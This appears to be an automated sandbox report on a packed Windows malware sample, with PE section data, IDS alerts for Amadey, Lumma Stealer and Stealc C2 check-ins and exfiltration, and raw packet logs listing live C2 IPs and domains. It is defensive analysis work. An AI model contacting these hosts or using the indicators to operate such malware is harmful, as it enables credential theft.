                                                                                                                                                                                                                                                  add byte ptr [esi], al
                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x4ac.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x31ca9c0x10lwujlavl
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x31ca4c0x18lwujlavl
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  0x10000x680000x68000b1ed97179dbdc9e4cd17266c9d7d4197False0.5579951359675481data7.13202937691271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x690000x4ac0x6002304f222d5eb6df1acee8e1e1eef3270False0.3717447916666667data5.386102745775112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  lwujlavl0x6b0000x2b20000x2b1c00c5db8ea48a0b19aa31582c598cac22ccunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  zofmlovi0x31d0000x10000x40011e81ff5d0c13855802e1c21343505f0False0.787109375data6.112101012187836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .taggant0x31e0000x30000x2200e60b2b2c747c162b127c4aedcae73919False0.06789981617647059DOS executable (COM)0.8503050534480306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_MANIFEST0x690700x2bbXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.4978540772532189
                                                                                                                                                                                                                                                  RT_MANIFEST0x6932c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2025-01-03T09:50:04.061611+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449770185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:04.328619+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.1680192.168.2.449770TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:04.551519+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449770185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:07.146387+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449791185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:07.397483+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449791185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:09.563594+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449807185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:09.791132+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449807185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:10.412074+01002058397ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)1192.168.2.4529851.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-03T09:50:10.899228+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449818188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:10.899228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449818188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.510432+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449819135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.684265+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449820185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.692315+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449818188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.692315+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449818188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.715662+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449819135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.721695+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1135.181.65.21680192.168.2.449819TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.910887+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449820185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:11.920539+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449819135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.172414+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449826188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.172414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449826188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.180388+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1135.181.65.21680192.168.2.449819TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.624291+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449819135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.639246+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449826188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.639246+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449826188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:12.831145+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449819135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:13.424061+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449837188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:13.424061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449837188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:14.291539+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449842185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:15.561274+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449848140.82.121.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:16.597193+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449861188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:16.597193+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449861188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:18.664165+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449883188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:18.664165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449883188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:19.203267+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449884185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:19.420474+01002058622ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)1192.168.2.4591641.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-03T09:50:19.912091+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449898172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:19.912091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449898172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:20.250223+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449893140.82.121.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:20.785880+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449898172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:20.785880+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449898172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.115507+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449910188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.115507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449910188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.399227+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449913172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.399227+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449913172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.573845+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449910188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.892928+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449913172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:21.892928+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449913172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:23.065813+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449931188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:23.065813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449931188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:23.611771+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449934172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:23.611771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449934172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:24.250485+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449934172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:24.531951+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449920135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:25.001315+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449945172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:25.001315+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449945172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:25.429448+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449920135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:26.071603+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449920135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:26.246877+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449955172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:26.246877+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449955172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:26.392061+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449957188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:26.392061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449957188.114.97.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:26.584723+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449920135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:28.273032+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449920135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:28.578914+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449974172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:28.578914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449974172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:28.610356+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449971185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:28.840129+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449920135.181.65.21680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:29.688966+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449976140.82.121.3443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:30.470394+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.449988172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:30.470394+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449988172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:32.511339+01002058623ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI)1192.168.2.450004172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:32.511339+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450004172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:33.006161+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450004172.67.156.127443TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:42.393281+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450061185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:42.620125+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450061185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:48.281114+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450064185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:48.506796+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450064185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:51.674603+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450065185.215.113.20680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:51.910410+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.450065185.215.113.20680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:51.938250+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.450065TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:52.159890+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.450065185.215.113.20680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:52.170374+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.450065TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:52.672664+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450066185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:53.358957+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.450065185.215.113.20680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:53.377315+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45006731.41.244.1180TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:53.905821+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450065185.215.113.20680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:56.919818+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450068185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:50:57.700407+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45007531.41.244.1180TCP
                                                                                                                                                                                                                                                  2025-01-03T09:51:03.839407+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450085185.215.113.1680TCP
                                                                                                                                                                                                                                                  2025-01-03T09:51:07.246569+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450084185.215.113.20680TCP

                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Jan 3, 2025 09:49:02.205203056 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                  Jan 3, 2025 09:49:18.591429949 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                  Jan 3, 2025 09:49:18.596376896 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:49:18.596788883 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:03.332520962 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:03.337423086 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:03.337491989 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:03.337713003 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:03.342502117 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.061546087 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.061610937 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.065677881 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.070535898 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.321991920 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.322005033 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.322063923 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.323776960 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.328619003 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551446915 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551464081 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551477909 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551518917 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551554918 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551563978 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551574945 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551585913 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551604033 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551630974 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551660061 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551671028 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551683903 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551704884 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551731110 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.552109003 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.552119970 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.552129984 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.552153111 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.552201986 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681301117 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681323051 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681334019 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681385994 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681427002 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681499958 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681559086 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681570053 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681601048 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681634903 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.681936026 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682020903 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682032108 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682073116 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682261944 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682272911 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682284117 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682312965 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682327986 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682338953 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682351112 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682389021 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.682990074 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683034897 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683039904 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683051109 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683074951 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683094978 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683128119 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683140039 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683151007 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683175087 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.683211088 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684040070 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684051991 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684063911 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684099913 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684111118 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684118986 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684122086 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.684156895 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.811554909 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.811583042 CET8049770185.215.113.16192.168.2.4
